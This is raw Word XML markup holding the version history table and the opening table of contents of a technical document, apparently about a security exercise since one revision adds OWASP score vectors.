            <w:gridCol w:w="968"/>
            <w:gridCol w:w="1077"/>
            <w:gridCol w:w="6695"/>
          </w:tblGrid>
          <w:tr w:rsidR="00967A91" w:rsidRPr="001019D3" w14:paraId="732360E4" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
              <w:tblHeader/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="04F50533" w14:textId="66D3C18A" w:rsidR="00967A91" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="Tableheadings"/>
                  <w:spacing w:after="60"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-1221439666"/>
                    <w:dataBinding w:xpath="/Texts/TechHistoryVersion" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00967A91" w:rsidRPr="001019D3">
                      <w:t>Version</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="46D52987" w14:textId="64B4B095" w:rsidR="00967A91" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="Tableheadings"/>
                  <w:spacing w:after="60"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-1272547222"/>
                    <w:dataBinding w:xpath="/Texts/TechHistoryDate" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00967A91" w:rsidRPr="001019D3">
                      <w:t>Date</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="7AA6FC20" w14:textId="02E74216" w:rsidR="00967A91" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="Tableheadings"/>
                  <w:spacing w:after="60"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:sdt>
                  <w:sdtPr>
                    <w:id w:val="-773793181"/>
                    <w:dataBinding w:xpath="/Texts/TechHistoryComment" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
                    <w:text w:multiLine="1"/>
                  </w:sdtPr>
                  <w:sdtEndPr/>
                  <w:sdtContent>
                    <w:r w:rsidR="00967A91" w:rsidRPr="001019D3">
                      <w:t>Comment</w:t>
                    </w:r>
                  </w:sdtContent>
                </w:sdt>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="005E6AE9" w:rsidRPr="001019D3" w14:paraId="2D518451" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="2F49020A" w14:textId="4E6C1542" w:rsidR="005E6AE9" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.1</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="1EE0132D" w14:textId="63CDE7DD" w:rsidR="005E6AE9" w:rsidRPr="001019D3" w:rsidRDefault="00CE7411" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>01/09/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="154C5B26" w14:textId="537C3DA9" w:rsidR="005E6AE9" w:rsidRPr="001019D3" w:rsidRDefault="005E6AE9" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t xml:space="preserve">Initial document by </w:t>
                </w:r>
                <w:r w:rsidR="008B7B09" w:rsidRPr="001019D3">
                  <w:t xml:space="preserve">Miltiadis </w:t>
                </w:r>
                <w:proofErr w:type="spellStart"/>
                <w:r w:rsidR="008B7B09" w:rsidRPr="001019D3">
                  <w:t>Nasopoulos</w:t>
                </w:r>
                <w:proofErr w:type="spellEnd"/>
                <w:r w:rsidR="008B7B09" w:rsidRPr="001019D3">
                  <w:t xml:space="preserve"> &amp; </w:t>
                </w:r>
                <w:r w:rsidR="006769A8" w:rsidRPr="001019D3">
                  <w:t>Stathis Schinas</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00195DB3" w:rsidRPr="001019D3" w14:paraId="24BD5C86" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="13CCBD11" w14:textId="3DC94BA5" w:rsidR="00195DB3" w:rsidRPr="001019D3" w:rsidRDefault="000F3492" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.2</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="307DFEE8" w14:textId="43664A03" w:rsidR="00195DB3" w:rsidRPr="001019D3" w:rsidRDefault="00CE7411" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>12/09/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="6CA8D9ED" w14:textId="4396D555" w:rsidR="00195DB3" w:rsidRPr="001019D3" w:rsidRDefault="000F3492" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t xml:space="preserve">QA review </w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00315373" w:rsidRPr="001019D3" w14:paraId="3EC12530" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="36C4CD67" w14:textId="5FFBCAD9" w:rsidR="00315373" w:rsidRPr="001019D3" w:rsidRDefault="00CE7411" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.3</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="3708B179" w14:textId="7849C063" w:rsidR="00315373" w:rsidRPr="001019D3" w:rsidRDefault="00CE7411" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>12/09/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="638D4C9E" w14:textId="39996549" w:rsidR="00315373" w:rsidRPr="001019D3" w:rsidRDefault="00CE7411" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>Suggested Amendments by Stathis Schinas</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="002521CD" w:rsidRPr="001019D3" w14:paraId="242FBCAA" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="1F1C0F99" w14:textId="530E21C3" w:rsidR="002521CD" w:rsidRPr="001019D3" w:rsidRDefault="006B2533" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.4</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="128F2C0A" w14:textId="00519BE2" w:rsidR="002521CD" w:rsidRPr="001019D3" w:rsidRDefault="006B2533" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>15/09/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="19992BBD" w14:textId="7D741B33" w:rsidR="002521CD" w:rsidRPr="001019D3" w:rsidRDefault="006B2533" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t xml:space="preserve">Added OWASP Score Vectors </w:t>
                </w:r>
                <w:r w:rsidR="00B67EFD" w:rsidRPr="001019D3">
                  <w:t>by Stathis Schinas</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00DB5044" w:rsidRPr="001019D3" w14:paraId="23998130" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="061FF9A8" w14:textId="590C81C1" w:rsidR="00DB5044" w:rsidRPr="001019D3" w:rsidRDefault="0013352D" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.5</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="13B95FA0" w14:textId="65C51F10" w:rsidR="00DB5044" w:rsidRPr="001019D3" w:rsidRDefault="0013352D" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>01/10/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="49963C70" w14:textId="38B79E96" w:rsidR="00DB5044" w:rsidRPr="001019D3" w:rsidRDefault="0013352D" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>Content update – steps added</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00C93392" w:rsidRPr="001019D3" w14:paraId="3CC057D8" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="5679526F" w14:textId="6B8FB311" w:rsidR="00C93392" w:rsidRPr="001019D3" w:rsidRDefault="00C93392" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.9</w:t>
                </w:r>
                <w:r w:rsidR="000920D5" w:rsidRPr="001019D3">
                  <w:t>6</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="075C53E1" w14:textId="4D749F95" w:rsidR="00C93392" w:rsidRPr="001019D3" w:rsidRDefault="006016FE" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>03</w:t>
                </w:r>
                <w:r w:rsidR="00C93392" w:rsidRPr="001019D3">
                  <w:t>/1</w:t>
                </w:r>
                <w:r w:rsidRPr="001019D3">
                  <w:t>1</w:t>
                </w:r>
                <w:r w:rsidR="00C93392" w:rsidRPr="001019D3">
                  <w:t>/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="7C0A9342" w14:textId="671EE349" w:rsidR="00C93392" w:rsidRPr="001019D3" w:rsidRDefault="00C93392" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>Content finalised</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="005211B2" w:rsidRPr="001019D3" w14:paraId="721BFE45" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="70212C9E" w14:textId="4A8E2FF3" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>0.99</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="43B98FD3" w14:textId="7ABDC0E0" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>04/11/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="40CF772E" w14:textId="2468D179" w:rsidR="005211B2" w:rsidRPr="001019D3" w:rsidRDefault="005211B2" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>Final review before approval</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
          <w:tr w:rsidR="00F27A8E" w:rsidRPr="001019D3" w14:paraId="4200C7AF" w14:textId="77777777" w:rsidTr="004E098F">
            <w:trPr>
              <w:cantSplit/>
            </w:trPr>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="554" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="44588CF2" w14:textId="01249D78" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>1.0</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="616" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="1423EDEB" w14:textId="7842AA62" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>05/11/2025</w:t>
                </w:r>
              </w:p>
            </w:tc>
            <w:tc>
              <w:tcPr>
                <w:tcW w:w="3830" w:type="pct"/>
              </w:tcPr>
              <w:p w14:paraId="416B0738" w14:textId="22B30BBC" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="00F27A8E" w:rsidP="00F219A5">
                <w:pPr>
                  <w:pStyle w:val="HistoryTable"/>
                  <w:ind w:left="57" w:right="57"/>
                </w:pPr>
                <w:r w:rsidRPr="001019D3">
                  <w:t>Final approval</w:t>
                </w:r>
              </w:p>
            </w:tc>
          </w:tr>
        </w:tbl>
        <w:p w14:paraId="7BC9CDD4" w14:textId="77777777" w:rsidR="000A3C26" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="00C05FB8">
          <w:pPr>
            <w:pStyle w:val="AfterTable"/>
            <w:rPr>
              <w:lang w:val="en-IE"/>
            </w:rPr>
          </w:pPr>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:bookmarkStart w:id="5" w:name="techToC" w:displacedByCustomXml="prev"/>
    <w:bookmarkEnd w:id="5" w:displacedByCustomXml="prev"/>
    <w:bookmarkEnd w:id="4" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="6" w:name="_Toc467505738" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="7" w:name="_Toc467505764" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="8" w:name="_Toc467505873" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="9" w:name="_Toc467505899" w:displacedByCustomXml="prev"/>
    <w:bookmarkStart w:id="10" w:name="_Toc156556647" w:displacedByCustomXml="prev"/>
    <w:p w14:paraId="6E6E4C41" w14:textId="7040AA15" w:rsidR="00C05FB8" w:rsidRPr="001019D3" w:rsidRDefault="00C05FB8" w:rsidP="00C05FB8">
      <w:pPr>
        <w:pStyle w:val="AfterTable"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:alias w:val="Table of Contents"/>
        <w:tag w:val="eqT1QegFOKAi3zHpinqjV4"/>
        <w:id w:val="1266732402"/>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7CE2A298" w14:textId="1AE9476B" w:rsidR="0047154C" w:rsidRPr="001019D3" w:rsidRDefault="00706DA2" w:rsidP="0047154C">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:sdt>
            <w:sdtPr>
              <w:id w:val="1897158656"/>
              <w:dataBinding w:xpath="/Texts/TOCHeading" w:storeItemID="{4EF90DE6-88B6-4264-9629-4D8DFDFE87D2}"/>
              <w:text w:multiLine="1"/>
            </w:sdtPr>
            <w:sdtEndPr/>
            <w:sdtContent>
              <w:r w:rsidR="0047154C" w:rsidRPr="001019D3">
                <w:t>Table of Contents</w:t>
              </w:r>
            </w:sdtContent>
          </w:sdt>
        </w:p>
        <w:p w14:paraId="0DDCBDA9" w14:textId="171D4101" w:rsidR="00F27A8E" w:rsidRPr="001019D3" w:rsidRDefault="0047154C">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:b w:val="0"/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w:lang w:eastAsia="en-IE"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="001019D3">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="001019D3">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc213253529" w:history="1">
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:b w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IE"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>Management summary</w:t>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253529 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="00F27A8E" w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6864B4AA" w14:textId="1B930597"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30" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>1.1.</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Synopsis</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253530 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A73C767" w14:textId="23F9A35C"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31" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof w:val="0"/>
              </w:rPr>
              <w:t>1.2.</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Outcome</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253531 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:noProof w:val="0"/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46B5BEF7" w14:textId="0ED5AA77"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32" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.2.1.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Skill level</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc213253532 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00706DA2">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="456BF002" w14:textId="3B45EA4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33" w:history="1">
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
              </w:rPr>
              <w:t>1.2.2.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Goals and objectives</w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:webHidden/>
              </w:rPr>
